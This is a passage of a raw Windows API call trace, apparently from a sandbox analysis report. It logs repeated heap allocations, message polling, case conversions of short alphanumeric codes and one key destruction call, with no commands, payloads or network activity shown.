Size=0x8) returned 0x2415a18 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.692] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.692] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0164.692] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0164.692] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0164.692] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.692] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0164.692] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.693] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0164.693] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0164.693] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0164.693] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0164.693] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.693] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0164.693] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.693] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.693] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.694] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0164.694] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.694] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.694] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0164.694] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.694] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.694] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0164.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.695] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.695] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.695] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.696] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0164.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0164.697] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0164.697] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.697] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0164.697] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.697] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.697] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.697] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0164.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.698] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.698] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0164.698] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.698] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.698] CryptDestroyKey (hKey=0xaa56a0) returned 1 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0164.699] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.699] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.699] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0164.699] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.699] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0164.699] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.699] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0164.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.700] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0164.700] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.700] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0164.700] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0164.700] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.700] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0164.700] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0164.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.700] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.700] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0164.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.701] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.701] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0164.701] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0164.701] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.701] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.701] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.701] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.701] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.701] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0164.701] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.701] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0164.701] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.701] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.701] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0164.702] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.702] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0164.702] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.702] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.702] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.702] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.702] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.702] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.702] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.702] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.702] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.702] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.702] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.702] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.702] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.702] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.702] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.702] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | 